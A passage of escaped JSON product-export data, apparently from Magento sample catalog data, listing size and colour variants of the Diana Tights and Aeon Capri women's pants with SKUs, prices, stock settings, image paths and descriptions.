qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp06-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp06-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Orange\"},\"1804\":{\"sku\":\"WP06-29-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diana Tights-29-Black\",\"description\":\"<p>Perfect for hot bikram session or cool-down stretching. 8-percent stretch means you\'ll feel like anything is possible in the capri-style Diana Tights.<\\/p>\\n<p>&bull; Black legging with slate details.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Secret interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diana-tights-29-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp06-black_alt1.jpg,\\/w\\/p\\/wp06-black_back.jpg,\\/w\\/p\\/wp06-black_outfit.jpg\",\"image\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp06-black_alt1.jpg,\\/w\\/p\\/wp06-black_back.jpg,\\/w\\/p\\/wp06-black_outfit.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Black\"},\"1805\":{\"sku\":\"WP06-29-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diana Tights-29-Blue\",\"description\":\"<p>Perfect for hot bikram session or cool-down stretching. 8-percent stretch means you\'ll feel like anything is possible in the capri-style Diana Tights.<\\/p>\\n<p>&bull; Black legging with slate details.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Secret interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diana-tights-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1806\":{\"sku\":\"WP06-29-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diana Tights-29-Orange\",\"description\":\"<p>Perfect for hot bikram session or cool-down stretching. 8-percent stretch means you\'ll feel like anything is possible in the capri-style Diana Tights.<\\/p>\\n<p>&bull; Black legging with slate details.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Secret interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diana-tights-29-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp06-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp06-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp06-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp06-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp06-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Orange\"},\"1807\":{\"sku\":\"WP06\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diana Tights\",\"description\":\"<p>Perfect for hot bikram session or cool-down stretching. 8-percent stretch means you\'ll feel like anything is possible in the capri-style Diana Tights.<\\/p>\\n<p>&bull; Black legging with slate details.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Secret interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Capri|Leggings,material=Microfiber|Polyester|Spandex,pattern=Solid,climate=All-weather|Cool|Indoor|Mild|Spring|Warm,eco_collection=No,performance_fabric=No,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WP06-28-Black,size=28,color=Black|sku=WP06-28-Blue,size=28,color=Blue|sku=WP06-28-Orange,size=28,color=Orange|sku=WP06-29-Black,size=29,color=Black|sku=WP06-29-Blue,size=29,color=Blue|sku=WP06-29-Orange,size=29,color=Orange\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp06-black_alt1.jpg,\\/w\\/p\\/wp06-black_back.jpg,\\/w\\/p\\/wp06-black_outfit.jpg\",\"image\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp06-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp06-black_alt1.jpg,\\/w\\/p\\/wp06-black_back.jpg,\\/w\\/p\\/wp06-black_outfit.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Capri|Leggings\",\"material\":\"Microfiber|Polyester|Spandex\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Indoor|Mild|Spring|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"No\"},\"1808\":{\"sku\":\"WP07-28-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Aeon Capri-28-Black\",\"description\":\"<p>Reach for the stars and beyond in these Aeon Capri pant. With a soft, comfortable feel and moisture wicking fabric, these duo-tone leggings are easy to wear -- and wear attractively.<\\/p>\\n<p>&bull; Black capris with teal accents.<br \\/>&bull; Thick, 3\\\" flattering waistband.<br \\/>&bull; Media pocket on inner waistband.<br \\/>&bull; Dry wick finish for ultimate comfort and dryness.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aeon-capri-28-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp07-black_alt1.jpg,\\/w\\/p\\/wp07-black_back.jpg\",\"image\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp07-black_alt1.jpg,\\/w\\/p\\/wp07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Black\"},\"1809\":{\"sku\":\"WP07-28-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Aeon Capri-28-Blue\",\"description\":\"<p>Reach for the stars and beyond in these Aeon Capri pant. With a soft, comfortable feel and moisture wicking fabric, these duo-tone leggings are easy to wear -- and wear attractively.<\\/p>\\n<p>&bull; Black capris with teal accents.<br \\/>&bull; Thick, 3\\\" flattering waistband.<br \\/>&bull; Media pocket on inner waistband.<br \\/>&bull; Dry wick finish for ultimate comfort and dryness.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aeon-capri-28-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp07-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp07-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp07-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp07-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp07-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Blue\"},\"1810\":{\"sku\":\"WP07-28-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Aeon Capri-28-Orange\",\"description\":\"<p>Reach for the stars and beyond in these Aeon Capri pant. With a soft, comfortable feel and moisture wicking fabric, these duo-tone leggings are easy to wear -- and wear attractively.<\\/p>\\n<p>&bull; Black capris with teal accents.<br \\/>&bull; Thick, 3\\\" flattering waistband.<br \\/>&bull; Media pocket on inner waistband.<br \\/>&bull; Dry wick finish for ultimate comfort and dryness.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aeon-capri-28-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp07-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp07-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp07-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp07-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp07-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Orange\"},\"1811\":{\"sku\":\"WP07-29-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Aeon Capri-29-Black\",\"description\":\"<p>Reach for the stars and beyond in these Aeon Capri pant. With a soft, comfortable feel and moisture wicking fabric, these duo-tone leggings are easy to wear -- and wear attractively.<\\/p>\\n<p>&bull; Black capris with teal accents.<br \\/>&bull; Thick, 3\\\" flattering waistband.<br \\/>&bull; Media pocket on inner waistband.<br \\/>&bull; Dry wick finish for ultimate comfort and dryness.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aeon-capri-29-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp07-black_alt1.jpg,\\/w\\/p\\/wp07-black_back.jpg\",\"image\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp07-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp07-black_alt1.jpg,\\/w\\/p\\/wp07-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Black\"},\"1812\":{\"sku\":\"WP07-29-Blue\",\"store_view_code\":null,\"attribute_